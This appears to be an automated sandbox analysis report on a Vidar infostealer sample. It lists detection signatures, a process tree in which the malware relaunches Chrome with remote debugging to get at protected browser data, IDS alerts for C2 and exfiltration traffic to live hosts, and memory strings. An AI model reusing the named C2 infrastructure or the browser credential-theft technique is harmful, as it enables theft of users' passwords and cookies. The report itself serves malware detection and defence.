Edit tour

Windows Analysis Report
random(2).exe

Overview

General Information

Sample name:	random(2).exe
Analysis ID:	1643067
MD5:	5e941e7c271e85093cb8344fb7cab50b
SHA1:	7a1f977cfd43da7dec3acfd45fcfea91f3acb76c
SHA256:	51c583db2595a3aefa45efaa70c8f0cc1394c18549746bc9fe654fedb9d17e57
Tags:	176-113-115-7exeuser-JAMESWT_MHT
Infos:

Detection

Vidar

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Attempt to bypass Chrome Application-Bound Encryption

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Vidar stealer

Hides threads from debuggers

Joe Sandbox ML detected suspicious sample

PE file contains section with special chars

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Abnormal high CPU Usage

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Entry point lies outside standard sections

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Browser Started with Remote Debugging

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

random(2).exe (PID: 6980 cmdline: "C:\Users\user\Desktop\random(2).exe" MD5: 5E941E7C271E85093CB8344FB7CAB50B)

chrome.exe (PID: 7804 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 8048 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2296,i,9997688068787143346,17471011568796092826,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2464 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 3436 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 4968 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 512 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 1532 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 6768 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 4056 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: E81F54E6C1129887AEA47E7D092680BF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.1130116827.0000000000B79000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000003.1152734556.0000000000B76000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000003.1171301147.0000000000B77000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: random(2).exe PID: 6980	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: random(2).exe PID: 6980	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\random(2).exe", ParentImage: C:\Users\user\Desktop\random(2).exe, ParentProcessId: 6980, ParentProcessName: random(2).exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 7804, ProcessName: chrome.exe

Suricata Signatures

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-19T14:00:17.957230+0100	2044247	1	Malware Command and Control Activity Detected	78.47.63.132	443	192.168.2.10	49685	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-19T14:00:20.590469+0100	2051831	1	Malware Command and Control Activity Detected	78.47.63.132	443	192.168.2.10	49686	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-19T14:00:20.590290+0100	2049087	1	A Network Trojan was detected	192.168.2.10	49686	78.47.63.132	443	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-19T14:00:28.067428+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.10	49694	78.47.63.132	443	TCP
2025-03-19T14:02:16.338105+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.10	49699	78.47.63.132	443	TCP
2025-03-19T14:02:16.739083+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.10	49700	78.47.63.132	443	TCP
2025-03-19T14:02:17.804395+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.10	49701	78.47.63.132	443	TCP
2025-03-19T14:02:19.840485+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.10	49702	78.47.63.132	443	TCP

ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-19T14:02:16.739083+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.10	49700	78.47.63.132	443	TCP
2025-03-19T14:02:17.804395+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.10	49701	78.47.63.132	443	TCP
2025-03-19T14:02:19.840485+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.10	49702	78.47.63.132	443	TCP

ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-19T14:00:14.506040+0100	2859378	1	Malware Command and Control Activity Detected	192.168.2.10	49683	78.47.63.132	443	TCP

Joe Sandbox Signatures

• AV Detection
• Compliance
• Spreading
• Software Vulnerabilities
• Networking
• System Summary
• Data Obfuscation
• Boot Survival
• Malware Analysis System Evasion
• Anti Debugging
• Language, Device and Operating System Detection
• Stealing of Sensitive Information
• Remote Access Functionality

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: random(2).exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: random(2).exe	Virustotal: Detection: 50%			Perma Link
Source: random(2).exe	ReversingLabs: Detection: 58%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: random(2).exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.10:49681 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 78.47.63.132:443 -> 192.168.2.10:49682 version: TLS 1.2

Source: C:\Users\user\Desktop\random(2).exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\	Jump to behavior

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 38MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.10:49683 -> 78.47.63.132:443
Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.10:49686 -> 78.47.63.132:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.10:49700 -> 78.47.63.132:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.10:49700 -> 78.47.63.132:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.10:49694 -> 78.47.63.132:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.10:49702 -> 78.47.63.132:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.10:49702 -> 78.47.63.132:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 78.47.63.132:443 -> 192.168.2.10:49686
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.10:49699 -> 78.47.63.132:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.10:49701 -> 78.47.63.132:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.10:49701 -> 78.47.63.132:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 78.47.63.132:443 -> 192.168.2.10:49685

Source: global traffic

HTTP traffic detected: GET /g_etcontent HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View	IP Address: 78.47.63.132 78.47.63.132

Source: Joe Sandbox View

ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /g_etcontent HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0Host: y.p.formaxprime.co.ukConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJe2yQEIo7bJAQipncoBCJr0ygEIlKHLAQiKo8sBCIWgzQEI/aXOAQiB1s4BCMHYzgEIydzOAQjg4M4BCOXjzgEIr+TOAQjI5M4BCN/kzgEIi+XOAQiO5c4BSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJe2yQEIo7bJAQipncoBCJr0ygEIlKHLAQiKo8sBCIWgzQEI/aXOAQiB1s4BCMHYzgEIydzOAQjg4M4BCOXjzgEIr+TOAQjI5M4BCN/kzgEIi+XOAQiO5c4BSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9

Source: chrome.exe, 0000000C.00000003.2419053610.00003CCC00328000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <!--_html_template_end_-->`}const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$2()}render(){return getHtml$2.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$3=null;function getCss$1(){return instance$3\|\|(instance$3=[...[getCss$4()],css`:host{--ntp-logo-height:168px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chrome://new-tab-page/icons/share_unfilled.svg);background-color:var(--color-new-tab-page-doodle-share-button-i
Source: chrome.exe, 0000000C.00000003.2419053610.00003CCC00328000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <!--_html_template_end_-->`}const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$2()}render(){return getHtml$2.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$3=null;function getCss$1(){return instance$3\|\|(instance$3=[...[getCss$4()],css`:host{--ntp-logo-height:168px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chrome://new-tab-page/icons/share_unfilled.svg);background-color:var(--color-new-tab-page-doodle-share-button-i

Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: y.p.formaxprime.co.uk
Source: global traffic	DNS traffic detected: DNS query: www.google.com

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----90r90zuknop8ym7qiwbsUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0Host: y.p.formaxprime.co.ukContent-Length: 256Connection: Keep-AliveCache-Control: no-cache

Source: chrome.exe, 0000000C.00000002.6037129593.00003CCC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://clients2.google.com/time/1/current
Source: chrome.exe, 0000000C.00000002.5846593062.00003CCC000DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://developer.chrome.com/docs/extensions/how-to/distribute/install-extensions)
Source: chrome.exe, 0000000C.00000002.5817119523.00003CCC000A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: chrome.exe, 0000000C.00000002.2655107307.00000249DAA8D000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
Source: chrome.exe, 0000000C.00000002.2655107307.00000249DAA8D000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://www.google.com/update2/response
Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/
Source: chrome.exe, 0000000C.00000002.5785927082.00003CCC0003C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
Source: chrome.exe, 0000000C.00000002.6037129593.00003CCC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/AccountChooser
Source: chrome.exe, 0000000C.00000002.6037129593.00003CCC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/AddSession
Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
Source: chrome.exe, 0000000C.00000002.6037129593.00003CCC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/Logout
Source: chrome.exe, 0000000C.00000002.6037129593.00003CCC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/RotateBoundCookies
Source: chrome.exe, 0000000C.00000002.6206613229.00003CCC002D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
Source: chrome.exe, 0000000C.00000002.6206613229.00003CCC002D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
Source: chrome.exe, 0000000C.00000002.6037129593.00003CCC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/chrome/blank.html
Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/windows
Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
Source: chrome.exe, 0000000C.00000002.5829878346.00003CCC000B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
Source: chrome.exe, 0000000C.00000002.5829878346.00003CCC000B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxABata
Source: chrome.exe, 0000000C.00000002.6037129593.00003CCC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/o/oauth2/revoke
Source: chrome.exe, 0000000C.00000002.6037129593.00003CCC0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/oauth/multilogin
Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/samlredirect
Source: chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
Source: chrome.exe, 0000000C.00000002.5877330232.00003CCC00138000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: wt26ph.0.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700
Source: wt26ph.0.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&cta
Source: chrome.exe, 0000000C.00000003.2419271192.00003CCC0176C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2418998130.00003CCC0174C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://calendar.google.com
Source: chrome.exe, 0000000C.00000003.2415297744.00003CCC01614000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 0000000C.00000002.2655346363.00000249DACD7000.00000004.08000000.00040000.00000000.sdmp, chrome.exe, 0000000C.00000002.6071108728.00003CCC00234000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: chrome.exe, 0000000C.00000003.2415004575.00003CCC01544000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2415297744.00003CCC01614000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
